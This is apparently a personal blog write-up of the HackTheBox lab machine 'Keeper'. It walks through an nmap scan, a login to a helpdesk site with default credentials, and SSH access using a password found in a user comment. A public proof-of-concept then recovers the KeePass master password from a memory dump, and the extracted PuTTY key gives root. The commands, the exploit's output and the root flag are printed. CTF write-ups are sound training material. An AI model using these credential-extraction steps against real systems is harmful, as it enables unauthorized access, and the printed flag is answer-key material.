remoteshell.zip
Posts Tags Categories
remoteshell.zip

HTB: Keeper

 included in  categories HTB CTF
     451 words   2 minutes 

Keeper is an easy HTB machine which mimicks a helpdesk. I get inital access with default credentials. With that I find a comment which reveals a password that I use to login to SSH. I then use an exploit on the KeePass dump file, which gives the root putty SSH key.

I start with an nmap scan sudo nmap -sVC -v 10.10.11.227 -oN nmap/all

It shows port 22,80 and 8000 open.

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA) |_ 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 8000/tcp open http SimpleHTTPServer 0.6 (Python 3.10.12) | http-methods: |_ Supported Methods: GET HEAD |_http-title: Directory listing for / |_http-server-header: SimpleHTTP/0.6 Python/3.10.12 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SimpleHTTPServer seems to be on port 8000, and files shown on the page.
Pasted image 20230901193728

Here it shows the users flag!
Pasted image 20230901194101
I download the other files to my linux machine, the passcodes.kdbx and KeePassDempFull.dmp files stand out (the RT30000.zip file also contain these files)
I tried to use keepass2john to bruteforce it, but no results.

I didn’t have keepass yet, so i downloaded it https://keepassxc.org/

For now I wanted to continue exploring the other ports.

Web page shows the following
Pasted image 20230901193420

I add tickets.keerper.htb to my /etc/hosts file.

It displays the following page:
Pasted image 20230901193457After trying some default usernames and passwords, it lets me in with root:password.
Pasted image 20230901195445
At the users page, it shows two users.
Pasted image 20230901204235

In lnorgaard’s user page, there is a comments where it shows an initial password.
Pasted image 20230901204304

I try to connect via ssh and it works!

ls -la shows that lnorgaards home directory is the same as the python http server on port 8000.
Pasted image 20230901204717

After looking online what i could do with a KeePassDumpFull.dmp file, i stumbled upon the following github script;
https://github.com/CMEPW/keepass-dump-masterkey

python3 poc.py ~/Documents/keeper/webserver_downloads/KeePassDumpFull.dmp 2023-09-01 14:07:59,930 [.] [main] Opened /home/fabian/Documents/keeper/webserver_downloads/KeePassDumpFull.dmp Possible password: ●,dgr●d med fl●de Possible password: ●ldgr●d med fl●de Possible password: ●`dgr●d med fl●de Possible password: ●-dgr●d med fl●de Possible password: ●'dgr●d med fl●de Possible password: ●]dgr●d med fl●de Possible password: ●Adgr●d med fl●de rodgrod med flode

After googling, it showed this danish dish.
Pasted image 20230901202948

With that in hand, I managed to unlock the database file!
Pasted image 20230901203941

I downloaded putty for linux sudo apt install putty

Copied the notes to a file named putty_key
Pasted image 20230901210039

Then I use puttygen with -O private-openssh to specify the output type.

puttygen putty_key -O private-openssh -o new_ssh_key

using ssh with the new_ssh_key to connect as root

ssh -i ./new_ssh_key root@10.10.11.227

And I succesfully found the root flag!

root@keeper:~# cat root.txt e205f760f01c160cd091fec25090159c

Updated on 03 Nov 2024
Read markdown
 HTBNmapKeePassKeeperPutty
 | Home